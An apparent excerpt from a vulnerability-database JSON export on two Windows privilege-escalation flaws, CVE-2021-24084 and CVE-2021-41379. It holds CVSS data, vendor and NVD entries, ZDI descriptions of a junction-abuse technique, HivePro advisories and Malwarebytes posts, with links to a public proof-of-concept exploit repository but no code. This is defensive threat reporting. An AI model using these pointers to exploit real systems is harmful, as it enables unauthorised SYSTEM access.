{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mscve", "title": "Windows Installer Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-09T08:00:00", "id": "MS:CVE-2021-41379", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-01T05:28:01", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Microsoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf>)\n\nAn improperly patched Windows vulnerability (CVE-2021-24084) can lead to local privilege escalation and information disclosure. 
The vulnerability was disclosed in October 2020 and even after Microsoft addressed this vulnerability in February 2021\u2019s Patch Tuesday, a researcher was able to exploit the patched vulnerability making it another zero-day made by improper patching.\n\nCVE-2021-24084 was an information disclosure vulnerability in the Windows Mobile Device Management component but later it was discovered that it could be exploited for local privilege escalation that allows an attacker to gain admin privilege and reading arbitrary files even if they don\u2019t have the permissions to do so. All the versions of Windows 10 even after the November patch are affected by this vulnerability.\n\nAfter examining Microsoft's fix, [Abdelhamid Naceri](<https://github.com/klinix5/InstallerFileTakeOver>), the security researcher who discovered this vulnerability, discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability. He also made the proof-of-concept available to the public.\n\nAn unofficial micro patch has been released by 0patch and will be available for free until Microsoft releases an official patch for the vulnerability.\n\n#### Vulnerability Details\n\n\n\n#### Patch Link\n\n<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>\n\n#### References\n\n<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>\n\n<https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html>\n\n<https://www.techradar.com/sg/news/nasty-windows-10-vulnerability-gets-a-patch-but-not-from-microsoft>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, 
"impactScore": 3.6}, "published": "2021-12-01T04:26:33", "type": "hivepro", "title": "Microsoft could not patch this vulnerability yet again", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-01T04:26:33", "id": "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability-yet-again/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-26T17:20:32", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Microsoft-could-not-patch-this-vulnerability_TA202150-1.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nMicrosoft released patches for 44 vulnerabilities on November 9th. CVE-2021-41379 was among them. 
However, installing this patch does not completely eliminate the vulnerability.\n\nAn [exploit](<https://github.com/klinix5/InstallerFileTakeOver>) for a new Windows zero-day local privilege elevation vulnerability that grants admin privileges in Windows 10, Windows 11, and Windows Server has been publicly disclosed by a security researcher, [Abdelhamid Naceri](<https://github.com/klinix5/>).\n\nCVE-2021-41379 is a privilege escalation vulnerability that allows an attacker with limited access on a compromised system to move laterally within the same network. All the versions of Windows 10, Windows 11 and Windows Server are affected by this vulnerability.\n\nAfter examining Microsoft's fix, the security researcher who discovered this vulnerability discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability.\n\nThere are currently no workarounds for this vulnerability. Any attempt to directly patch the binary will result in a failure of the Windows installer. 
We must wait for Microsoft to resolve this issue.\n\n#### Vulnerability Details\n\n\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:56:28", "type": "hivepro", "title": "Microsoft could not patch this vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-23T10:56:28", "id": "HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:46:25", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", 
"privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-24084", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-03-04T15:34:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2021-24084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:17:12", "description": "Windows Installer Elevation of 
Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "cve", "title": "CVE-2021-41379", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-12T20:17:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41379", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-05-01T12:57:33", "description": "<h1 align=\"center\">WindowsMDM-LPE-0Day</h1>\n<i><h3 align=\"center...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-28T09:48:36", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to 
an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-05-01T12:04:50", "id": "291894F9-38D4-5877-8B8F-EF46C6D23B82", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-10T14:59:52", "description": "# WindowsMDMLPE\n\nDemo : ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-27T00:37:07", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": 
"2022-02-10T13:34:38", "id": "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-20T21:38:55", "description": "# shakeitoff\r\n\r\nA smaller, minimized, and cleaner version of [In...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T19:15:59", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883"], "modified": "2022-03-20T15:46:42", "id": "DF9C9272-7F4D-5362-A6BF-18A60A5E907D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdi": [{"lastseen": "2022-01-31T22:27:52", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Device Management Enrollment Service. 
By creating a directory junction, an attacker can abuse the Device Management Enrollment Service to disclose the contents of arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Device Management Enrollment Service Directory Junction Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-02-10T00:00:00", "id": "ZDI-21-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-178/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-01-31T22:15:05", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Windows Installer service. 
By creating a junction, an attacker can abuse the service to delete a file or directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdi", "title": "Microsoft Windows Installer Service Link Following Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-11T00:00:00", "id": "ZDI-21-1308", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-11-26T18:36:46", "description": "Sometimes the ways in which malicious code gets in the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.\n\nA quick summary of the events in the history of this exploit:\n\n * A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on an affected system with elevated privileges.\n * Microsoft patched 
the vulnerability in November\u2019s Patch Tuesday update.\n * The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft\u2019s bug bounty program.\n * The researcher\u2019s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.\n\nLet's have a look at what is going on and how it came to this.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question was listed as [CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>) and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.\n\nBy exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.\n\n### The patch\n\nMicrosoft patched the vulnerability in the [November Patch Tuesday updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>). But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.\n\nWith the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. 
To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim's machine, but now they can run the code with SYSTEM privileges thanks to the exploit.\n\n### The frustration\n\nThe researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the [Trend Micro zero-day initiative](<https://www.zerodayinitiative.com>), that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.\n\nApparently the main reason for his frustration was the reward level.\n\n\u201cMicrosoft\u2019s rewards have been very bad since April 2020; the community wouldn\u2019t make these kinds of decisions if Microsoft took its rewards seriously.\u201d\n\n### In the wild\n\nSeveral security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quickly attackers are able to weaponize publicly available exploit code.\n\n### Mitigation\n\nThe researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn\u2019t seem confident that Microsoft will get it right this time.\n\n"Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again."\n\nMicrosoft says it is working on it. 
In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.\n\nMalwarebytes detects and stops the exploit\n\nStay safe, everyone!\n\nThe post [Windows Installer vulnerability becomes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:21:50", "type": "malwarebytes", "title": "Windows Installer vulnerability becomes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-24T14:21:50", "id": "MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 
3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn't an FCEB agency that needs to follow the [Binding Operational Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it's added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you're looking yourself, you need to click on the arrow of the "Date Added to Catalog" column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new at all. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20-year-old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). 
Other products include those by Microsoft (27), Adobe (16), and Oracle (7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and carry out other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A 